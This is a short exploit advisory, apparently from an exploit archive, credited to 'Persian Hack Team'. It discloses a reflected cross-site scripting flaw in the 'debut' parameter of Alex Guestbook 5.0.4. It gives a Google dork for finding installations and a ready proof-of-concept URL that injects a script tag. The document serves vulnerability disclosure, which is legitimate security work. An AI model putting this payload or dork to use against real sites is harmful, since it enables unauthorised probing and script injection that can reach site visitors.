Alex Guestbook version 5.0.4 suffers from a cross site scripting vulnerability.
055933b640169d8875bc574472dfe2eb708ab18325639a596a789ea149c0039a
# Exploit Title: Alex Guestbook Version 5.0.4 - Cross Site Scripting
# Exploit Author: Persian Hack Team
# Discovered by : Mojtaba MobhaM (Mojtaba Kazemi)
# Vendor Home : http://www.alexguestbook.net/
# Home : http://persian-team.ir/
# Google Dork : inurl:alex_guestbook3
# Telegram Channel: @PersianHackTeam
# Tested on: Linux
# Date: 2017-05-23
# POC :
# Cross Site Scripting :
# debut Parameter Vulnerable To XSS
http://www.server/alex_guestbook3/?debut=22237"><script>alert(/XSS/)</script>&mots_search=&lang=&skin=&seeAdd=&seeNotes=&seeMess=&test=
# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
# Iranian White Hat Hackers